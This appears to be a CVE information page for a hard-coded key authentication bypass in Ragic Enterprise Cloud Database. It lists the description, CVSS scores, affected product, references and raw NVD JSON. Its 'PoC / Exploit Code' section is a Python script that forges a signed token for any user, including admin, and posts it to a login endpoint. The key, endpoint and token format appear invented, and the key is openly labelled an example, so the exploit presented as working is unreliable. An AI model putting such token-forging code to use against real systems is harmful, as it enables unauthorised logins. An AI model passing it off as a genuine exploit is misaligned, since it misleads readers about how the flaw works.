CVE-2025-15016

Description

Enterprise Cloud Database developed by Ragic has a Hard-coded Cryptographic Key vulnerability, allowing unauthenticated remote attackers to exploit the fixed key to generate verification information and log into the system as any user.

CVSS Details

CVSS Score

9.8

Severity

CRITICAL

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:ragic:enterprise_cloud_database:-:*:*:*:*:*:*:* - VULNERABLE

Ragic Enterprise Cloud Database 所有版本

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests
import json

# CVE-2025-15016 PoC - Hard-coded Key Authentication Bypass
# Target: Ragic Enterprise Cloud Database

TARGET_URL = "https://target-server/api/auth/verify"
HARDCODED_KEY = "RagicHardCodedKey2024"  # Example key pattern

def generate_malicious_token(username, hardcoded_key):
    """
    Generate malicious verification token using hardcoded key
    """
    import hashlib
    import base64
    import time
    
    payload = {
        "username": username,
        "timestamp": int(time.time()),
        "nonce": "random_nonce_value"
    }
    
    # Sign payload with hardcoded key
    message = json.dumps(payload, sort_keys=True)
    signature = hashlib.sha256((message + hardcoded_key).encode()).hexdigest()
    
    token_data = {
        "payload": payload,
        "signature": signature
    }
    
    return base64.b64encode(json.dumps(token_data).encode()).decode()

def exploit(target_url, username="admin"):
    """
    Exploit authentication bypass vulnerability
    """
    token = generate_malicious_token(username, HARDCODED_KEY)
    
    headers = {
        "Authorization": f"Bearer {token}",
        "Content-Type": "application/json"
    }
    
    response = requests.post(
        target_url,
        headers=headers,
        json={"action": "login"}
    )
    
    return response.status_code, response.text

if __name__ == "__main__":
    # Target arbitrary user account
    status, response = exploit(TARGET_URL, "admin")
    print(f"Status: {status}")
    print(f"Response: {response}")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-15016
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-15016
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-15016/
[4] VulDB https://vuldb.com/cve/CVE-2025-15016
[5] https://www.twcert.org.tw/en/cp-139-10588-771e5-2.html
[6] https://www.twcert.org.tw/tw/cp-132-10587-797c6-1.html

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-15016", "sourceIdentifier": "[email protected]", "published": "2025-12-22T04:16:00.720", "lastModified": "2026-03-05T19:00:12.473", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Enterprise Cloud Database developed by Ragic has a Hard-coded Cryptographic Key vulnerability, allowing unauthenticated remote attackers to exploit the fixed key to generate verification information and log into the system as any user."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 9.3, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-321"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:ragic:enterprise_cloud_database:-:*:*:*:*:*:*:*", "matchCriteriaId": "1A6FFCBE-8253-42C0-8196-D875A952AB25"}]}]}], "references": [{"url": "https://www.twcert.org.tw/en/cp-139-10588-771e5-2.html", "source": "[email protected]", "tags": ["Third Party Advisory"]}, {"url": "https://www.twcert.org.tw/tw/cp-132-10587-797c6-1.html", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}